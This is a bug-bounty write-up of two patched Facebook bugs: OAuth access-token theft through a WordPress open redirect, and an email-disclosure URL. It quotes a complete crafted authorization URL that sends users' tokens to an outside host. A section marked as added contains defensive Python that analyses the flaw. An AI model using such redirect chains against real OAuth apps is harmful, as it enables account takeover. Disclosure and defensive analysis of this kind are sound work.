BUG #1: STEALING OAUTH ACCESS TOKEN ($500)
Introduction:
--------------
Facebook apps (including Facebook internal apps) that accept a redirect_url on a WordPress domain are affected by this attack. It was caused by an open redirection bug in WordPress sites.
Steps:
-------
1. Facebook launched shemeansbusiness.fb.com (client_id=757713104362213). By default the redirect_url was https://staticxx.facebook.com/connect/xd_arbiter.php
2. The app accepted the shemeansbusiness.fb.com domain in redirect_url, and also fbshemeansbusiness.wordpress.com.
3. So, I crafted a new URL:
https://www.facebook.com/dialog/oauth?display=page&response_type=token&fbconnect=1&client_id=757713104362213&redirect_uri=https%3A%2F%2Ffbshemeansbusiness.wordpress.com%2Fremote-login.php%3Faction%3Dlogout%26back=https://google.sttor.com
Here the redirect URL is:
https%3A%2F%2Ffbshemeansbusiness.wordpress.com%2Fremote-login.php%3Faction%3Dlogout%26back=https://google.sttor.com
4. So if any person has pre-authorized this app, or uses it for the first time via the crafted URL, the access token will be redirected to external websites (having the google or wordpress keyword in the domain).
5. Even techcrunch.com has an open redirection and sends the access token to external websites.
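The following is an added example, not code from the original write-up or from Facebook. It contrasts the permissive host-based redirect_url policy described in the steps above with an exact-match policy against pre-registered URIs, flags a redirect_uri that itself carries a nested URL (the open-redirector pattern), and models where the implicit-flow token (response_type=token) ends up when the landing page 302s to its back parameter. The allowlists, the check functions and the token-flow model are constructed assumptions for illustration; only the crafted URL and client_id are taken from the write-up.

```python
"""
Added example, not code from the original write-up or from Facebook: it contrasts
the permissive host-based redirect_uri policy the write-up describes with the
exact-match policy that closes the hole, and models where an implicit-flow token
ends up when the landing page is an open redirector. The allowlists and the
checks are constructed assumptions, not Facebook's real implementation.
"""
from urllib.parse import urlsplit, parse_qs

# Constructed allowlists for the app in the write-up (client_id 757713104362213).
# Matching on host alone is the weak policy; exact pre-registered URIs are the fix.
ALLOWED_HOSTS = {
    "shemeansbusiness.fb.com",
    "fbshemeansbusiness.wordpress.com",
    "staticxx.facebook.com",
}
REGISTERED_REDIRECT_URIS = {
    "https://staticxx.facebook.com/connect/xd_arbiter.php",  # default from the write-up
}


def weak_redirect_check(redirect_uri):
    """Flawed policy: any https URL on an allowed host passes; path and query are ignored."""
    parts = urlsplit(redirect_uri)
    return parts.scheme == "https" and parts.hostname in ALLOWED_HOSTS


def strict_redirect_check(redirect_uri):
    """Hardened policy: exact string comparison against registered redirect URIs
    (RFC 6749 s3.1.2.2; the OAuth 2.0 Security BCP requires exact matching)."""
    return redirect_uri in REGISTERED_REDIRECT_URIS


def nested_url_params(redirect_uri):
    """Names of query parameters in redirect_uri whose value is an absolute URL.
    A cheap detection heuristic: a redirect target that itself carries a
    redirect target is the signature of an open redirector being chained."""
    query = urlsplit(redirect_uri).query
    hits = []
    for name, values in parse_qs(query, keep_blank_values=True).items():
        if any(v.lower().startswith(("http://", "https://", "//")) for v in values):
            hits.append(name)
    return hits


def token_recipient_host(redirect_uri):
    """Constructed model of the implicit flow (response_type=token).

    The authorization server delivers the token in the URL fragment of
    redirect_uri. If that page is an open redirector that 302s to the URL in
    its 'back' parameter (as remote-login.php?action=logout does in the
    write-up), the browser re-attaches the original fragment to a Location
    that has none (RFC 7231 s7.1.2), so the token reaches the final host.
    Returns the host that can read the token.
    """
    landing = urlsplit(redirect_uri)
    back = [v for v in parse_qs(landing.query).get("back", [])
            if v.lower().startswith(("http://", "https://"))]
    return urlsplit(back[0]).hostname if back else landing.hostname


def evaluate_authorization_request(auth_url):
    """Pull redirect_uri out of a full /dialog/oauth URL and run every check on it."""
    params = parse_qs(urlsplit(auth_url).query)
    redirect_uri = params.get("redirect_uri", [""])[0]  # parse_qs percent-decodes the value
    return {
        "redirect_uri": redirect_uri,
        "implicit_flow": params.get("response_type", [""])[0] == "token",
        "weak_check_passes": weak_redirect_check(redirect_uri),
        "strict_check_passes": strict_redirect_check(redirect_uri),
        "nested_url_params": nested_url_params(redirect_uri),
        "token_recipient_host": token_recipient_host(redirect_uri),
    }


# The crafted authorization URL quoted in the write-up.
CRAFTED_URL = (
    "https://www.facebook.com/dialog/oauth?display=page&response_type=token"
    "&fbconnect=1&client_id=757713104362213&redirect_uri=https%3A%2F%2F"
    "fbshemeansbusiness.wordpress.com%2Fremote-login.php%3Faction%3Dlogout"
    "%26back=https://google.sttor.com"
)

if __name__ == "__main__":
    for key, value in evaluate_authorization_request(CRAFTED_URL).items():
        print(f"{key}: {value}")
```

Run stand-alone, the script shows the crafted request passing the host-based check, failing the exact-match check, carrying a nested URL in its back parameter, and delivering the token to google.sttor.com rather than to the WordPress host. The design point is that host matching is the wrong granularity: once any page on an allowed host can redirect elsewhere, the whole host becomes a token sink, whereas exact URI registration confines the token to a handler the app actually controls.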
BUG #2: EMAIL DISCLOSURE of users who submitted a link on shemeansbusiness.fb.com ($500)
For example, this URL was disclosing the user's email: https://shemeansbusiness.fb.com/fbsmb_submission/lea-rafferty/
Both bugs were patched immediately. Today Facebook awarded me a total of $1000 for these two bugs.